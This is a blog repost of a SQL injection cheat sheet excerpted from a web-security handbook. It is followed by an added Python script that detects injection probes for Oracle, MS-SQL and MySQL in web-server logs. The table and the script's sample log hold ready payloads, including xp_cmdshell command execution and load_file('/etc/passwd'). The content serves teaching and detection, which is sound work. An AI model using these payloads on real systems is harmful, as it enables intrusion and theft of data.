Excerpted from: The Web Application Hacker's Handbook
Chinese edition: 《黑客攻防技术宝典Web实战篇》 (2nd edition)
| | Oracle | MS-SQL | MySQL |
|---|---|---|---|
| ASCII and substring | `ASCII('A')` `SUBSTR('ABCDE',2,3)` | `ASCII('A')` `SUBSTRING('ABCDE',2,3)` | `ASCII('A')` `SUBSTRING('ABCDE',2,3)` |
| Current database user | `SELECT sys.login_user FROM dual`; `SELECT user FROM dual`; `SYS_CONTEXT('USERENV','SESSION_USER')` | `SELECT suser_sname()` | `SELECT user()` |
| Cause a time delay | `UTL_HTTP.request('http://xx.com')` | `waitfor delay '0:0:10'`; `exec master..xp_cmdshell 'ping localhost'` | `sleep(100)` |
| Database version | `SELECT banner FROM v$version` | `SELECT @@version` | `SELECT @@version` |
| Current database | `SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM dual` | `SELECT db_name()`; server name: `SELECT @@servername` | `SELECT database()` |
| Current user's privileges | `SELECT privilege FROM session_privs` | `SELECT grantee,table_name,privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES` | `SELECT * FROM information_schema.user_privileges WHERE grantee='[user]'`, where `[user]` is taken from the output of `SELECT user()` |
| List all tables and columns | `SELECT table_name\|\|' '\|\|column_name FROM all_tab_columns` | `SELECT table_name+' ',column_name FROM information_schema.columns` | `SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns` |
| List user objects | `SELECT object_name,object_type FROM user_objects` | `SELECT name FROM sysobjects` | `SELECT table_name FROM information_schema.tables` (or `trigger_name FROM information_schema.triggers`, etc.) |
| List user tables | `SELECT object_name,object_type FROM user_objects WHERE object_type='TABLE'`; or, for all tables the user can access: `SELECT table_name FROM all_tables` | `SELECT name FROM sysobjects WHERE xtype='U'` | `SELECT table_name FROM information_schema.tables WHERE table_type='BASE TABLE' AND table_schema!='mysql'` |
| Column names of table foo | `SELECT column_name,name FROM user_tab_columns WHERE table_name='foo'`; if the target data is not owned by the current application user, use `ALL_TAB_COLUMNS` instead | `SELECT column_name FROM information_schema.columns WHERE table_name='foo'` | `SELECT column_name FROM information_schema.columns WHERE table_name='foo'` |
| Interact with the operating system (simplest way) | See David Litchfield's The Oracle Hacker's Handbook | `exec xp_cmdshell 'dir c:\'` | `SELECT load_file('/etc/passwd')` |
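From the defender's side, the same dialect-specific syntax is what lets you tell from web-server logs which engine an injection attempt was probing for. The following is an added example, not code from the book or from the blog: it turns the table above into a small signature set, runs it over a constructed Apache/nginx combined-format log (the sample entries, IP, timestamps and paths are all made up), URL-decodes each request twice so double-encoded probes are not missed, and applies a simple heuristic, stated as an assumption, that dialect-specific probes the server answered without a 5xx error point at the backend actually in use.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures derived from the cheat-sheet table above. Each regex is matched
# case-insensitively against the URL-decoded request and mapped to the DBMS
# dialect it belongs to; "MS-SQL/MySQL" marks syntax those two engines share.
SIGNATURES = [
    ("Oracle",       r"\bfrom\s+dual\b"),
    ("Oracle",       r"v\$version"),
    ("Oracle",       r"\bsys_context\s*\(\s*'userenv'"),
    ("Oracle",       r"\butl_http\.request\s*\("),
    ("Oracle",       r"\b(all_tab_columns|user_tab_columns|user_objects|all_tables|session_privs)\b"),
    ("MS-SQL",       r"\bwaitfor\s+delay\b"),
    ("MS-SQL",       r"\bxp_cmdshell\b"),
    ("MS-SQL",       r"\bsuser_sname\s*\("),
    ("MS-SQL",       r"\bdb_name\s*\(|@@servername"),
    ("MS-SQL",       r"\bsysobjects\b"),
    ("MySQL",        r"\bload_file\s*\("),
    ("MySQL",        r"\bsleep\s*\(\s*\d+\s*\)"),
    ("MySQL",        r"\b(database|user)\s*\(\s*\)"),
    ("MySQL",        r"\binformation_schema\.user_privileges\b"),
    ("MS-SQL/MySQL", r"@@version"),
    ("MS-SQL/MySQL", r"\binformation_schema\.(tables|columns)\b"),
]
COMPILED = [(dbms, re.compile(pat, re.IGNORECASE)) for dbms, pat in SIGNATURES]

# Request target and status code of an Apache/nginx "combined" log entry
# (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample log, not real traffic: one benign request, then probes in
# three dialects. The backend answered the Oracle and MS-SQL syntax with 500s
# and the MySQL syntax with 200s; the last entry is double URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /item?id=1%20UNION%20SELECT%20banner%20FROM%20v%24version-- HTTP/1.1" 500 231
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /item?id=1;%20waitfor%20delay%20%270:0:10%27-- HTTP/1.1" 500 231
203.0.113.5 - - [10/Oct/2023:13:55:49 +0000] "GET /item?id=1%20AND%20sleep(10)-- HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /item?id=1%2520UNION%2520SELECT%2520load_file(%2527/etc/passwd%2527)-- HTTP/1.1" 200 4096
"""


def fingerprint(decoded):
    """Map each DBMS dialect to the signature patterns it matched in one decoded request."""
    hits = {}
    for dbms, rx in COMPILED:
        if rx.search(decoded):
            hits.setdefault(dbms, []).append(rx.pattern)
    return hits


def decode_target(target):
    """URL-decode twice so double-encoded probes (%2527 -> %27 -> ') are not missed."""
    return unquote_plus(unquote_plus(target))


def scan_log(text):
    """Return (line_no, [dialects], status, decoded_target) for every entry carrying a probe."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a combined-format request line
        decoded = decode_target(m.group("target"))
        hits = fingerprint(decoded)
        if hits:
            findings.append((n, sorted(hits), int(m.group("status")), decoded))
    return findings


def suspected_backend(findings):
    """Heuristic (an assumption of this example): dialect-specific probes that the
    server answered without a 5xx error point at the engine actually in use;
    syntax shared by two engines casts no vote."""
    votes = Counter()
    for _, dialects, status, _ in findings:
        if status >= 500:
            continue
        for d in dialects:
            if "/" not in d:
                votes[d] += 1
    return votes.most_common(1)[0][0] if votes else "unknown"


if __name__ == "__main__":
    for n, dialects, status, decoded in scan_log(SAMPLE_LOG):
        print(f"line {n}: {status} {'/'.join(dialects):12} {decoded}")
    print("suspected backend:", suspected_backend(scan_log(SAMPLE_LOG)))
```

Run it on a real access log by replacing `SAMPLE_LOG` with the file contents; the per-line findings are the useful output, while `suspected_backend` only tells you which dialect the probing session converged on, which is a prompt to check the real backend's privilege model (for example whether the application account can reach `load_file` or `xp_cmdshell` at all), not proof of compromise.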
This post is from the "saluteiceman" blog; please keep this attribution: http://maxvision.blog.51cto.com/6269192/1695002